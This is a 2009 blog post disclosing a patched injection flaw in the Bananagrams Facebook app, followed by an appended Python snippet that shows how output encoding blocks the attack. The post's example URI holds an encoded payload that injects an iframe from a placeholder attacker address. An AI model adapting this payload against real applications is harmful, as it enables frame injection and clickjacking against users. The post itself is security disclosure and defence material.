Sep. 13, 2009


FAXX Hack: Bananagrams

Sorry for not posting yesterday – I’ll post another FAXX Hack in a bit to make up for it.

Facebook Verified Application

Current Monthly Active Users: 22,215

Current Rank on Application Leaderboard: 1,165

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/bananagrams/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E
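
The Example URI above, decoded and rendered with and without output encoding, as an added example that is not code from this post or from the application. The template is hypothetical (the post does not show the page markup; the payload's leading `"/>` suggests the value was reflected inside a double-quoted attribute), and all function names are illustrative.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Example URI from the post; EVILURI is the post's own placeholder.
EXAMPLE_URI = ("http://apps.facebook.com/bananagrams/invite.php"
               "?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E")

# Assumption: hypothetical template standing in for the page's markup,
# with tp_code reflected inside a double-quoted attribute.
TEMPLATE = '<input type="hidden" name="tp_code" value="{}"/>'


class TagCollector(HTMLParser):
    """Record the name of every element the parser encounters."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tp_code_from(uri):
    """URL-decode the tp_code query parameter."""
    return parse_qs(urlsplit(uri).query)["tp_code"][0]


def render_unsafe(value):
    """Reflect the value verbatim, as a vulnerable page would."""
    return TEMPLATE.format(value)


def render_escaped(value):
    """Reflect the value with HTML attribute encoding applied."""
    return TEMPLATE.format(escape(value, quote=True))


def breaks_out(rendered):
    """True if the rendered field holds any element besides the one input."""
    collector = TagCollector()
    collector.feed(rendered)
    collector.close()
    return collector.tags != ["input"]


if __name__ == "__main__":
    value = tp_code_from(EXAMPLE_URI)
    print("decoded tp_code:", value)
    print("unsafe breaks out: ", breaks_out(render_unsafe(value)))
    print("escaped breaks out:", breaks_out(render_escaped(value)))
```
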
